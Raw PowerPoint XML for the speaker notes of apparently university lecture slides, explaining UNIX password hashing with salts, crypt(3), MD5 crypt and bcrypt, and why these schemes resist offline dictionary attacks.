                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>load a new password into the system, the user selects or is assigned a password. This</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>password is combined with a fixed-length salt value  [MORR79]. In older implementations,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>this value is related to the time at which the password is assigned to the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Newer implementations use a pseudorandom or random number. The password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>and salt serve as inputs to a hashing algorithm to produce a fixed-length hash code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>The hash algorithm is designed to be slow to execute to thwart attacks. The hashed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>password is then stored, together with a plaintext copy of the salt, in the password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>file for the corresponding user ID. The hashed-password method has been shown to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>be secure against a variety of cryptanalytic attacks [WAGN00].</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When a user attempts to log on to a UNIX system, the user provides an ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>and a password (Figure 11.6b). The operating system uses the ID to index into the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>password file and retrieve the plaintext salt and the encrypted password. The salt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>and user-supplied password are used as input to the encryption routine. If the result</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>matches the stored value, the password is accepted.</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The salt serves three purposes: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It prevents duplicate passwords from being visible in the password file. Even</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>if two users choose the same password, those passwords will be assigned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>different salt values. Hence, the hashed passwords of the two users will</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>differ.</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It greatly increases the difficulty of offline dictionary attacks. For a salt of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>length b  bits, the number of possible passwords is increased by a factor of 2b ,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>increasing the difficulty of guessing a password in a dictionary attack.</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It becomes nearly impossible to find out whether a person with passwords on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>two or more systems has used the same password on all of them.</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To see the second point, consider the way that an offline dictionary attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>would work. The attacker obtains a copy of the password file. Suppose first that the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>salt is not used. The attacker’s goal is to guess a single password. To that end, the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> attacker submits a large number of likely passwords to the hashing function. If any</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>of the guesses matches one of the hashes in the file, then the attacker has found a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>password that is in the file. But faced with the UNIX scheme, the attacker must take</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>each guess and submit it to the hash function once for each salt value in the dictionary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>file, multiplying the number of guesses that must be checked.</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There are two threats to the UNIX password scheme. First, a user can gain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>access on a machine using a guest account or by some other means and then run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> a password guessing program, called a password cracker, on that machine. The</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>attacker should be able to check many thousands of possible passwords with little</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>resource consumption. In addition, if an opponent is able to obtain a copy of the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>password file, then a cracker program can be run on another machine at leisure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>This enables the opponent to run through millions of possible passwords in a reasonable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>period.</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="zh-CN">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" panose="020B0600070205080204"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1031">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{308A2932-63CB-4CC6-AFD5-5EADBCBA489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AC1E9239-255A-4E9C-9A45-C6FC845A3AA6}" type="slidenum">
              <a:rPr lang="en-AU" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>189</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-CN" sz="1200">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="241667" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E5B1938-8291-4D20-B364-B70D39337675}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="241668" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3CA5A93-A9A5-4AA2-9391-3311B7BAF5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MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> Since the original development of UNIX, most implementations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>have relied on the following password scheme. Each user selects a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>password of up to eight printable characters in length. This is converted into a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>56-bit value (using 7-bit ASCII) that serves as the key input to an encryption routine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>The hash routine, known as crypt(3), is based on DES. A 12-bit salt value is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>used. The modified DES algorithm is executed with a data input consisting of a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>64-bit block of zeros. The output of the algorithm then serves as input for a second</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>encryption. This process is repeated for a total of 25 encryptions. The resulting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>64-bit output is then translated into an 11-character sequence. The modification of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>the DES algorithm converts it into a one-way hash function. The crypt(3) routine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>is designed to discourage guessing attacks. Software implementations of DES are</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>slow compared to hardware versions, and the use of 25 iterations multiplies the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>time required by 25.</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This particular implementation is now considered woefully inadequate. For</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>example, [PERR03] reports the results of a dictionary attack using a supercomputer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>The attack was able to process over 50 million password guesses in about 80 minutes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Further, the results showed that for about $10,000 anyone should be able to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>do the same in a few months using one uniprocessor machine. Despite its known</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>weaknesses, this UNIX scheme is still often required for compatibility with existing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>account management software or in multivendor environments.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There are other, much stronger, hash/salt schemes available for UNIX. The</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>recommended hash function for many UNIX systems, including Linux, Solaris, and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>FreeBSD (a widely used open source UNIX implementation), is based on the MD5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>secure hash algorithm (which is similar to, but not as secure as SHA-1). The MD5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>crypt routine uses a salt of up to 48 bits and effectively has no limitations on password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>length. It produces a 128-bit hash value. It is also far slower than crypt(3). To</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>achieve the slowdown, MD5 crypt uses an inner loop with 1000 iterations.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Probably the most secure version of the UNIX hash/salt scheme was developed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>for OpenBSD, another widely used open source UNIX. This scheme, reported</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>in [PROV99], uses a hash function based on the Blowfish symmetric block cipher.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>The hash function, called Bcrypt, is quite slow to execute. Bcrypt allows passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>of up to 55 characters in length and requires a random salt value of 128 bits, to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>produce a 192-bit hash value. Bcrypt also includes a cost variable; an increase in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>the cost variable causes a corresponding increase in the time required to perform a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Bcyrpt hash. The cost assigned to a new password is configurable, so that administrators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>can assign a higher cost to privileged users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="3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1031">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A2ABB8E-7520-4BF0-B7EF-6E3262B367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C93F1646-6E23-4779-9D8D-7CBB462B2BBE}" type="slidenum">
              <a:rPr lang="en-AU" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>190</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-CN" sz="1200">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243715" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74254ACA-89A4-4384-B529-9675D21B84F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243716" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D19BBE4C-BCDB-4940-825F-C857A7B3710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MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> Even the stupendous guessing rates referenced in the preceding section do not</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>yet make it feasible for an attacker to use a dumb brute-force technique of trying</a:t>
            </a:r>
          </a:p>
